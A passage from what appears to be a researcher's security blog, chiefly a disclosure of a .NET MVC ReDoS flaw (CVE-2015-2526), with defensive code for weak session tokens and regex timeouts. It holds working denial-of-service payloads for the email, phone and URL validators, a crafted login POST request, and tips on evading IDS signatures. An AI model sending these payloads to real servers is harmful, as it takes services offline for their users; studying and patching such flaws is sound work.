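code; SAMPLE_SMEX_TOKENS are constructed to match the format described in the
post (4-5 digit numbers), not values taken from it."""
import math
import secrets
import string

SAMPLE_SMEX_TOKENS = ["48213", "9071", "17462", "5530", "30988"]  # constructed


def alphabet_size(tokens):
    """Smallest standard alphabet (digits, hex, base64url) covering every
    character observed; falls back to the count of distinct characters."""
    chars = set("".join(tokens))
    for size, alphabet in ((10, string.digits),
                           (16, string.hexdigits.lower()),
                           (16, string.hexdigits.upper()),
                           (64, string.ascii_letters + string.digits + "-_")):
        if chars <= set(alphabet):
            return size
    return len(chars)


def keyspace(tokens):
    """Number of distinct tokens the observed format can express: an upper
    bound on the entropy, since the generator may use even less of it."""
    return alphabet_size(tokens) ** max(len(t) for t in tokens)


def keyspace_bits(tokens):
    return math.log2(keyspace(tokens))


def expected_guesses(tokens, live_sessions=1):
    """Average number of distinct guesses before one lands on any of
    `live_sessions` valid tokens in a keyspace of N values: (N + 1) / (k + 1)."""
    return (keyspace(tokens) + 1) / (live_sessions + 1)


def is_guessable(tokens, min_bits=64):
    """OWASP's rule of thumb: a session identifier needs at least 64 bits of entropy."""
    return keyspace_bits(tokens) < min_bits


def generate_session_token():
    """What the server should issue instead: 32 bytes from the OS CSPRNG, base64url encoded."""
    return secrets.token_urlsafe(32)


if __name__ == "__main__":
    print(f"observed format: {keyspace_bits(SAMPLE_SMEX_TOKENS):.1f} bits, "
          f"~{expected_guesses(SAMPLE_SMEX_TOKENS):.0f} guesses for one live session")
    strong = generate_session_token()
    print(f"CSPRNG token: {keyspace_bits([strong]):.0f} bits, guessable={is_guessable([strong])}")
```

<div>
With a 5-digit numeric format the whole space is 100000 values, so even a single-threaded client enumerating a few requests per second exhausts it in hours, and more concurrent admin sessions shrink the expected effort further; the fix is a CSPRNG-backed identifier with at least 128 bits, as generate_session_token produces.</div>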
References:<br />
<br />
Trend Micro Reference: <a href="http://esupport.trendmicro.com/solution/en-US/1109669.aspx">http://esupport.trendmicro.com/solution/en-US/1109669.aspx</a><br />
CVE reference: <a href="http://www.cvedetails.com/cve/CVE-2015-3326/">http://www.cvedetails.com/cve/CVE-2015-3326/</a><br />
Session Prediction: <a href="https://www.owasp.org/index.php/Session_Prediction">https://www.owasp.org/index.php/Session_Prediction</a><br />
<br />
<br />
<br />Roberto Suggi Liverani<br />
<br />
<b>Microsoft .NET MVC ReDoS (Denial of Service) Vulnerability - CVE-2015-2526 (MS15-101)</b> (2015-09-10; updated 2018-07-08)<br />
<br />
Microsoft released a security bulletin (<a href="https://technet.microsoft.com/en-us/library/security/ms15-101.aspx">MS15-101</a>) describing a .NET MVC Denial of Service vulnerability (<a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2526">CVE-2015-2526</a>) that I reported back in April. This blog post analyses the vulnerability in detail, starting from the theory and then providing a PoC exploit against an MVC web application developed with Visual Studio 2013.<br />
For those of you who want to see the bug, you can directly skip to the last part of this post or watch the video directly... ;-)<br />
<br />
<b>A bit of theory</b><br />
<br />
The .NET framework (version 4.5 tested) uses a backtracking regular expression matcher when performing a match against an expression. Backtracking is based on an NFA (non-deterministic finite automaton) engine, which explores every way the input could match. Given an “evil” regex expression (one for which the engine can be forced to evaluate an exponential number of states), a crafted input forces the engine to perform an exponential amount of work, leading to a condition known as “catastrophic backtracking”, aka <a href="https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS">ReDoS</a>.<br />
<br />
<b>The vulnerability</b><br />
<br />
In .NET Framework (4.5), “evil” regular expressions are used by default in three classes (EmailAddressAttribute, PhoneAttribute, UrlAttribute) which are part of the System.ComponentModel.DataAnnotations .NET library.<br />
<br />
These classes provide the <b>default</b> validation mechanism for email address, phone number and URL input types in web forms. Furthermore, these three classes do not enforce a regex match timeout.<br />
<br />
The following screen shots show the evil regex and the lack of match timeout:<br />
<br />
<b><a href="http://referencesource.microsoft.com/#System.ComponentModel.DataAnnotations/DataAnnotations/EmailAddressAttribute.cs,11">EmailAddressAttribute Source code</a> </b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjO6f_2DislvzTIQUdhlHi4GZzr2ashXsKCN3gNh2jmXJXFVn5IM2h1PJtccQ2Rqa2eA-c3D9e-PmSL0fW346R8vO5uvilXH1dcAukRpBkPA_YI-Fuh0SZSKJJTJwy6wKr2UhRD7BDfu2k/s1600/email.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="301" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjO6f_2DislvzTIQUdhlHi4GZzr2ashXsKCN3gNh2jmXJXFVn5IM2h1PJtccQ2Rqa2eA-c3D9e-PmSL0fW346R8vO5uvilXH1dcAukRpBkPA_YI-Fuh0SZSKJJTJwy6wKr2UhRD7BDfu2k/s640/email.png" width="640" /></a></div>
<br />
<br />
<b><a href="http://referencesource.microsoft.com/#System.ComponentModel.DataAnnotations/DataAnnotations/PhoneAttribute.cs,9">PhoneAttribute Source Code</a></b><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtp4W988odbzZr0wGmi2oQ9n-OpMqpLLRPZgcupMjVB9G1cIhYSgA4ExfJtCmy_57tC6GlPFB7sKFORNkzW7khCv5r76OdULeHgzVDW0tEHAqq2HkU6xJWj2qn_D2Se8Y_cH-8tlEbNqk/s1600/phone.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="299" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtp4W988odbzZr0wGmi2oQ9n-OpMqpLLRPZgcupMjVB9G1cIhYSgA4ExfJtCmy_57tC6GlPFB7sKFORNkzW7khCv5r76OdULeHgzVDW0tEHAqq2HkU6xJWj2qn_D2Se8Y_cH-8tlEbNqk/s640/phone.png" width="640" /></a></div>
<br />
<b><a href="http://referencesource.microsoft.com/#System.ComponentModel.DataAnnotations/DataAnnotations/UrlAttribute.cs,11">UrlAttribute Source Code</a></b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6J5BzF75ab2im67OpS-fqv9vk4gqH2c3CVeUulPZ4VgsHKJ_OUWF9dXiB1a-nysoDqhMu4A-2txpmZxHvefPLIVyCVeyVCu1_-6SgOkBuTvnISGCWJ19wKtOlir81Qn2XMGkggNYTtmQ/s1600/url.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="269" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6J5BzF75ab2im67OpS-fqv9vk4gqH2c3CVeUulPZ4VgsHKJ_OUWF9dXiB1a-nysoDqhMu4A-2txpmZxHvefPLIVyCVeyVCu1_-6SgOkBuTvnISGCWJ19wKtOlir81Qn2XMGkggNYTtmQ/s640/url.png" width="640" /></a></div>
<br />
As a consequence, an attacker can craft a malicious payload that forces the .NET regex engine to perform a large number of computations and causes a Denial of Service against the targeted controller (e.g. a login form) that uses the default validation mechanism provided by the .NET framework.<br />
<br />
The Denial of Service condition is specific to the targeted controller (e.g. login form, registration form, contact form, etc.). Users can still navigate the rest of the site, but they are prevented from using the affected parts of it.<br />
<div>
<br /></div>
<div>
<div>
As an example, the .NET email address regex is analyzed. Its regex expression is considered an “evil” regex, due to its complexity, repetition, nesting and recursion. The regex is reported in the screen shot below. The software RegexBuddy was used to analyze it.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvU_YzFkNnO9Acpdk8do5tEv4MDtQgvV46Kg3ZR8BNCsNz3HQCmPIK9fi6wXY-S2aqDju8vSEpwAHqjG8QtyiEnr9reJpnD3oucaGlNECP9XkP5UXIDqj8a66dIQXBPfAR_UvNKtqNsUM/s1600/regex-analysis.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="137" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvU_YzFkNnO9Acpdk8do5tEv4MDtQgvV46Kg3ZR8BNCsNz3HQCmPIK9fi6wXY-S2aqDju8vSEpwAHqjG8QtyiEnr9reJpnD3oucaGlNECP9XkP5UXIDqj8a66dIQXBPfAR_UvNKtqNsUM/s640/regex-analysis.png" width="640" /></a></div>
<div>
<br /></div>
<div>
The theory of the attack is demonstrated below, with the help of RegexBuddy and its built-in debugger (set for C# - .NET 2.0-4.5), using the payload below, which will never match the above regex:</div>
<div>
<br /></div>
<div>
t@t.t.t.t.t.t.t.t.t.t.t.t.t.t.t%20</div>
<div>
<br /></div>
<div>
An extract of the last 26 operations (stopped by RegexBuddy) can be found below, from the Debugger view:</div>
</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-DZ454YxYiihbiaN7ENZdBgwNGTkCmGQJ7VUoXI7bB7crLU_bCtM2tV3j0aU9fC3UCoemh2rZ7zUHxr3GkyffFRkMtU4DQIslxU4C7Epe74Bzr5DSMyURGJCwPJqj6O2KaYgyhD37qhI/s1600/regex-analysis2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="454" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-DZ454YxYiihbiaN7ENZdBgwNGTkCmGQJ7VUoXI7bB7crLU_bCtM2tV3j0aU9fC3UCoemh2rZ7zUHxr3GkyffFRkMtU4DQIslxU4C7Epe74Bzr5DSMyURGJCwPJqj6O2KaYgyhD37qhI/s640/regex-analysis2.png" width="640" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<div>
This shows the “catastrophic backtracking” condition reached by the matcher. In this case RegexBuddy stops after one million steps; the vulnerable class, EmailAddressAttribute, however, does not enforce a match timeout, and therefore the .NET regex engine keeps computing steps, driving the w3wp.exe process (the IIS worker process) on the web server to 99% CPU for an extended period, which can last from several hours to days depending on the payload used.</div>
<div>
<br /></div>
<div>
The payload can be constructed in different ways, which lets the attacker bypass signature-based IDS/IPS controls. An attacker can also script the requests to hit vulnerable forms at regular intervals.</div>
</div>
<div>
<br /></div>
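<div>
The missing control in all three attributes is a match timeout. The Python block below, an added example that is not Microsoft's code, shows the equivalent defence: a regex match that is abandoned after a deadline (the analogue of the matchTimeout argument of .NET's Regex constructor, which raises RegexMatchTimeoutException) and a linear-time email check that cannot backtrack at all. EVIL_PATTERN is a constructed nested-quantifier regex used to trigger the behaviour, not the EmailAddressAttribute expression shown in the screenshot; POST_PAYLOAD is the payload from the post with %20 decoded.</div>

```python
"""Match-timeout wrapper (the Python analogue of the matchTimeout the .NET
attributes in the post never set) plus a linear-time email check.
Added example, not Microsoft's code. EVIL_PATTERN is a constructed
nested-quantifier regex, not the EmailAddressAttribute expression."""
import multiprocessing as mp
import re

# Classic catastrophic-backtracking shape: on "aaaa...!" the matcher tries
# about 2^n ways to split the a's between the two quantifiers before failing.
EVIL_PATTERN = r"^(a+)+$"

# Payload from the post, with %20 decoded to the trailing space.
POST_PAYLOAD = "t@" + ".".join(["t"] * 15) + " "

# fork avoids re-importing the caller's __main__ in the child; Windows lacks it.
try:
    _CTX = mp.get_context("fork")
except ValueError:
    _CTX = mp.get_context("spawn")


def _match_worker(pattern, text, conn):
    conn.send(re.fullmatch(pattern, text) is not None)
    conn.close()


def match_with_timeout(pattern, text, timeout_s=1.0):
    """True/False when the match finishes within timeout_s, None when it is
    abandoned. CPython's re engine cannot be interrupted mid-match, so the
    match runs in a child process that is terminated on timeout; the caller
    then treats the input as invalid, exactly what a .NET validator should do
    when RegexMatchTimeoutException is raised."""
    parent_conn, child_conn = _CTX.Pipe(duplex=False)
    proc = _CTX.Process(target=_match_worker, args=(pattern, text, child_conn))
    proc.start()
    child_conn.close()                 # parent keeps only the read end
    if parent_conn.poll(timeout_s):
        result = parent_conn.recv()
        proc.join()
        return result
    proc.terminate()                   # abandon the runaway match
    proc.join()
    return None


def validate_email_safely(value, max_len=254):
    """Structural check with no regex: one '@', non-empty local part, dotted
    domain with non-empty labels, no whitespace, bounded length.
    Every step is a single pass, so the cost is O(len(value)) for any input."""
    if not isinstance(value, str) or len(value) > max_len:
        return False
    if any(ch.isspace() for ch in value):
        return False
    local, sep, domain = value.partition("@")
    if not sep or not local or "@" in domain:
        return False
    labels = domain.split(".")
    return len(labels) >= 2 and all(labels)


if __name__ == "__main__":
    print(match_with_timeout(EVIL_PATTERN, "a" * 12))              # True, instantly
    print(match_with_timeout(EVIL_PATTERN, "a" * 40 + "!", 1.0))   # None: abandoned
    print(validate_email_safely(POST_PAYLOAD))                      # False (trailing space)
```

<div>
Either measure alone would have defused the post's payload: with a timeout the worker process gives up after a second instead of spinning for hours, and with the structural check the trailing space is rejected before any backtracking can start. A length cap on the field is a cheap third layer, since the blow-up grows with the number of repeated "t." groups.</div>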
<div>
<b>The exploit</b></div>
<div>
<br /></div>
<div>
The exploitation consists of sending a crafted HTTP POST request to a web form that uses a vulnerable class (e.g. EmailAddressAttribute). As an example, the attack is demonstrated against a .NET MVC web application developed with Visual Studio 2013. The application provides a login form which uses the default email address validation mechanism of the .NET framework. The screenshot below shows the login page:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgf0rCerZz4Z9BpJFK8bkCFqEuoakT1weT877khdJagltU_3pA7y5sUSiLo2gefZibSTfcCLtPusr8x0fm8qhLuLUGu8PPQNp-zTaF7FdGystbaXof0HROpvI17nnT2sdLx4Dn3xSRh2UU/s1600/login.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="262" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgf0rCerZz4Z9BpJFK8bkCFqEuoakT1weT877khdJagltU_3pA7y5sUSiLo2gefZibSTfcCLtPusr8x0fm8qhLuLUGu8PPQNp-zTaF7FdGystbaXof0HROpvI17nnT2sdLx4Dn3xSRh2UU/s320/login.png" width="320" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
An attacker can bypass client-side validation in .NET by sending the request via script or proxy and manipulating the request, as shown below:</div>
<div>
<br /></div>
<div>
<div>
<i>POST /Account/Login HTTP/1.1</i></div>
<div>
<i>Host: 192.168.0.13</i></div>
<div>
<i>User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0</i></div>
<div>
<i>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</i></div>
<div>
<i>Accept-Language: en-US,en;q=0.5</i></div>
<div>
<i>Accept-Encoding: gzip, deflate</i></div>
<div>
<i>Referer: http://192.168.0.13/Account/Login</i></div>
<div>
<i>Cookie: __RequestVerificationToken=FkLGrc6-XD2IBVU9g1nPycs0GTu3jWiK2QEyvR8IsowXAJU3C5fHlHvQvwGgB0VcN1FTa_hB9KZ6Pi8SeI5EKpvz_EeOqD7y_FnipWJWqOU1</i></div>
<div>
<i>Connection: keep-alive</i></div>
<div>
<i>Content-Type: application/x-www-form-urlencoded</i></div>
<div>
<i>Content-Length: 239</i></div>
<div>
<i><br /></i></div>
<div>
<i>__RequestVerificationToken=HQq6--asc9wLbvnvuapMLuj5y9f8tSg9n0JiEFivqKv_aeyl6eSaHaDtymjPgusP-spu-oUYa0xm7n_RKjmS9WOU2so8S96X6oY7K2fd3lk1&Email=<span style="color: red;"><b>t@t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.c%20</b></span>&Password=test&RememberMe=false</i></div>
</div>
<div>
<br />
Below, an extract of the source code used for the validation of the EmailAddress field:<br />
<br /></div>
<div>
AccountModelView.cs - use of the default [EmailAddress] attribute in .NET</div>
<div>
<br /></div>
<div>
<pre>public class LoginViewModel
{
    [Required]
    [Display(Name = "Email")]
    [EmailAddress]
    public string Email { get; set; }
    // remaining properties omitted from this extract
}</pre></div>
<div>
<br /></div>
<div>
AccountController.cs – ModelState is validated when the POST request occurs</div>
<div>
<br /></div>
<div>
<pre>
// POST: /Account/Login
[HttpPost]
[AllowAnonymous]
[ValidateAntiForgeryToken]
public async Task&lt;ActionResult&gt; Login(LoginViewModel model, string returnUrl)
{
    if (!ModelState.IsValid)
    {
        return View(model);
    }

    // This doesn't count login failures towards account lockout
    // To enable password failures to trigger account lockout, change to shouldLockout: true
    var result = await SignInManager.PasswordSignInAsync(model.Email, model.Password, model.RememberMe, shouldLockout: false);
    switch (result)
    {
</pre>
</div>
<div>
<br /></div>
<div>
The screenshots below show the DoS condition on the web server after the request has been issued.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtyUgsxtuxjQb7277Ppwt92L7VOM_94k-o1AiTJwmoBQKE-N6UtWgz5pcab8Jj3UTq_xie2SM1cDFA9RD4TFlx70C0Zzv5m8k0qUiHKTmfHcFMMihiBOk_rZ9pzMOskM3Ez1dTOBveACU/s1600/w3wpdos.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="88" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtyUgsxtuxjQb7277Ppwt92L7VOM_94k-o1AiTJwmoBQKE-N6UtWgz5pcab8Jj3UTq_xie2SM1cDFA9RD4TFlx70C0Zzv5m8k0qUiHKTmfHcFMMihiBOk_rZ9pzMOskM3Ez1dTOBveACU/s320/w3wpdos.png" width="320" /></a></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqNwuRuqLgbZqBZhhYo5wjcHqK7k8cOOjdtjyubyRSv-tNNPlurjAijWiIFV8iEcXytEVulenraalVya8Uqx5gOugdhcnsFt73x9Eal8CeZjbX9tF2BgyYg251CcIyfNAbsPXAg0slQGc/s1600/dos2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="197" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqNwuRuqLgbZqBZhhYo5wjcHqK7k8cOOjdtjyubyRSv-tNNPlurjAijWiIFV8iEcXytEVulenraalVya8Uqx5gOugdhcnsFt73x9Eal8CeZjbX9tF2BgyYg251CcIyfNAbsPXAg0slQGc/s320/dos2.png" width="320" /></a></div>
<div>
<br /></div>
<div>
<div>
Following the request, the Denial of Service occurs against the /Account/Login controller action. At this stage, no other user can use the /Account/Login form, while the w3wp.exe process sits at 99% CPU.</div>
<div>
<br /></div>
<div>
The w3wp.exe process needs to be terminated in order to recover the application from the attack. After a few manual recoveries, the application becomes unusable and the server needs to be restarted.</div>
<div>
<br />
Below is a video that demonstrates the attack in action:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/nOpAQFvbYFk/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/nOpAQFvbYFk?feature=player_embedded" width="320"></iframe></div>
<br />
<br /></div>
<div>
The table below lists tested payloads that trigger a ReDoS condition in .NET applications, together with the data-annotation validation attribute each one targets:<br />
<br /></div>
</div>
<div>
</div>
<div>
<table border="1" cellpadding="0" cellspacing="0" class="MsoTableGrid" style="border-collapse: collapse; border: none; mso-border-alt: solid windowtext .5pt; mso-padding-alt: 0in 5.4pt 0in 5.4pt; mso-table-layout-alt: fixed; mso-yfti-tbllook: 1184;">
<tbody>
<tr>
<td style="border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 179.75pt;" valign="top" width="300"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<b>Malicious Payload<o:p></o:p></b></div>
</td>
<td style="border-left: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 116.75pt;" valign="top" width="195"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<b>Class<o:p></o:p></b></div>
</td>
</tr>
<tr>
<td style="border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 179.75pt;" valign="top" width="300"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
t@t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.<br />
t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.c%20<o:p></o:p></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 116.75pt;" valign="top" width="195"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
EmailAddressAttribute<o:p></o:p></div>
</td>
</tr>
<tr>
<td style="border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 179.75pt;" valign="top" width="300"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
666666666666666666666666666666666666d<o:p></o:p></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 116.75pt;" valign="top" width="195"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
PhoneAttribute<o:p></o:p></div>
</td>
</tr>
<tr>
<td style="border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 179.75pt;" valign="top" width="300"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Consolas; font-size: 10.0pt;">http%3A%2F%2FtFtFtFtFtFtFtFtFtFtFtFtFtFtF<br />tFtFtFtFtFtFtFtFtFtFtest%2ecoK%2ecoK%2eco<br />K%2ecoK%2ecoK%2ecoK%2ecoK%2ecoK%2ecoK%2ec<br />oK%2ecoK%2ecoK%2ecoK%2ecoK%2ecoK%2ecoK%2e<br />coK%2ecoK%2ecoK%2ecoK%2ecoK%2ecoK%2ecoK%2<br />ecoK%2ecoK%2ecoK%2ecoK%2ecoK%2ecoK%2ecoK%<br />2ecoK%2ecoK%2ecoK%2ecoK%2ecoK%2ecoK%2ecoK<br />%2ecoK%2ecoK%2ecoK%2ecoK%2ecoK%2ecoK%2eco<br />K%2ecoK%2ecoK%2ecoK%2ecoK%2ecoK%2ecoK%2ec<br />oK%2ecoK%2ecoK%2ecoK%2ecoK%2ecoK%2ecoK%2e<br />coK%2ecoK%2ecoKøøm</span><o:p></o:p></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 116.75pt;" valign="top" width="195"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
UrlAttribute<o:p></o:p></div>
</td>
</tr>
</tbody></table>
<div class="MsoNormal">
</div>
<div class="MsoNormal">
<br /></div>
</div>
<div>
<br /></div>
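<div>
One way to harden a model like the LoginViewModel above against these payloads is to stop relying on an unbounded regex inside the validation attribute. The following is an added example (my own code, not the post's and not Microsoft's implementation of EmailAddressAttribute): a BoundedEmailAttribute (a hypothetical name) that caps the input length before the regex runs and evaluates a deliberately simple e-mail pattern (an assumption for this example, not the framework's pattern) under a Regex match timeout, failing closed on RegexMatchTimeoutException. The console program drives it through Validator.TryValidateObject, which is the same data-annotation validation MVC performs when it builds ModelState, with an input constructed in the shape of the first table row. The 100 ms and 200 ms budgets are illustrative values.</div>

```csharp
// Added example: a length-capped, timeout-protected e-mail validator for ASP.NET MVC
// data annotations. Not the post's code and not the pattern used by .NET's EmailAddressAttribute.
using System;
using System.Collections.Generic;
using System.ComponentModel.DataAnnotations;
using System.Diagnostics;
using System.Linq;
using System.Text.RegularExpressions;

// Hypothetical replacement for [EmailAddress]. Two guards stop a ReDoS payload before it can
// pin a w3wp.exe worker: an input length cap (checked before the regex runs) and a hard
// match timeout on the Regex object itself.
public sealed class BoundedEmailAttribute : ValidationAttribute
{
    private const int MaxLength = 254;   // RFC 5321 limit for a mailbox address

    // Deliberately simple pattern (an assumption for this example): no nested quantifiers,
    // so its worst case is polynomial, and the timeout bounds it regardless.
    private static readonly Regex EmailRegex = new Regex(
        @"^[^@\s]+@[^@\s]+\.[^@\s]+$",
        RegexOptions.None,
        TimeSpan.FromMilliseconds(100));   // illustrative budget

    public BoundedEmailAttribute()
        : base("The {0} field is not a valid e-mail address.") { }

    public override bool IsValid(object value)
    {
        if (value == null) return true;          // [Required] decides whether empty is allowed
        string s = value as string;
        if (s == null || s.Length > MaxLength) return false;   // reject before touching the regex
        try
        {
            return EmailRegex.IsMatch(s);
        }
        catch (RegexMatchTimeoutException)
        {
            return false;   // fail closed: the request is rejected instead of burning CPU
        }
    }
}

// Same shape as the post's LoginViewModel, with the guarded attribute on Email.
public class LoginViewModel
{
    [Required]
    [BoundedEmail]
    public string Email { get; set; }

    [Required]
    [DataType(DataType.Password)]
    public string Password { get; set; }

    public bool RememberMe { get; set; }
}

public static class Program
{
    // Runs the same data-annotation validation that MVC performs when it builds ModelState.
    public static bool Validate(string email, out List<ValidationResult> errors)
    {
        var model = new LoginViewModel { Email = email, Password = "not-a-real-password" };
        errors = new List<ValidationResult>();
        return Validator.TryValidateObject(model, new ValidationContext(model), errors, validateAllProperties: true);
    }

    public static void Main()
    {
        // Belt and braces for Regex objects created without an explicit timeout, including
        // ones you do not construct yourself. It must be set before any such Regex is
        // constructed, i.e. at application start (Application_Start in an MVC app).
        AppDomain.CurrentDomain.SetData("REGEX_DEFAULT_MATCH_TIMEOUT", TimeSpan.FromMilliseconds(200));

        // Constructed input in the shape of the first row of the payload table.
        string payload = "t@" + string.Concat(Enumerable.Repeat("t.", 47)) + "c ";
        string oversized = new string('a', 300) + "@example.com";

        foreach (string input in new[] { "alice@example.com", payload, oversized })
        {
            List<ValidationResult> errors;
            var sw = Stopwatch.StartNew();
            bool ok = Validate(input, out errors);
            sw.Stop();
            Console.WriteLine("len={0,4} valid={1,-5} {2} ms  {3}",
                input.Length, ok, sw.ElapsedMilliseconds,
                ok ? "" : string.Join("; ", errors.Select(e => e.ErrorMessage)));
        }
    }
}
```

<div>
The length cap is the cheaper of the two guards and rejects the oversized and padded inputs outright; the timeout is what protects the server when a pattern you cannot change (or did not know was in the request path) meets an input that defeats it. Returning false on a timeout keeps the failure inside ModelState, so the Login action above simply re-renders the form instead of holding a worker thread.</div>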
<div>
<b>References</b></div>
<div>
<br /></div>
<div>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l0 level1 lfo1; text-indent: -.25in;">
<a href="https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS">https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS</a><o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-indent: -.25in;">
<a href="https://www.owasp.org/images/3/38/20091210_VAC-REGEX_DOS-Adar_Weidman.pdf">https://www.owasp.org/images/3/38/20091210_VAC-REGEX_DOS-Adar_Weidman.pdf</a><o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-indent: -.25in;">
<a href="https://msdn.microsoft.com/en-us/library/hs600312%28v=vs.110%29.aspx">https://msdn.microsoft.com/en-us/library/hs600312%28v=vs.110%29.aspx</a><o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-indent: -.25in;">
<a href="https://msdn.microsoft.com/en-us/library/e347654k%28v=vs.110%29.aspx">https://msdn.microsoft.com/en-us/library/e347654k%28v=vs.110%29.aspx</a><o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-indent: -.25in;">
<a href="https://msdn.microsoft.com/en-us/library/gg578045(v=vs.110).aspx">https://msdn.microsoft.com/en-us/library/gg578045(v=vs.110).aspx</a><o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-indent: -.25in;">
<a href="https://msdn.microsoft.com/en-us/library/01escwtf(v=vs.110).aspx">https://msdn.microsoft.com/en-us/library/01escwtf(v=vs.110).aspx</a><o:p></o:p></div>
<div class="MsoListParagraphCxSpLast" style="mso-list: l0 level1 lfo1; text-indent: -.25in;">
<a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3275">https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3275</a><o:p></o:p></div>
</div>
<div>
<br /></div>
<b>Pwning a thin client in less than two minutes</b><br />
Roberto Suggi Liverani (http://www.blogger.com/profile/00603006078110455351), published 2015-04-27T01:37:00.000+02:00, updated 2015-04-27T08:07:55.037+02:00<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="margin-left: 1em; margin-right: 1em;">
</div>
<br />
<br />
Have you ever encountered a zero client or a thin client? It looks something like this...<br />
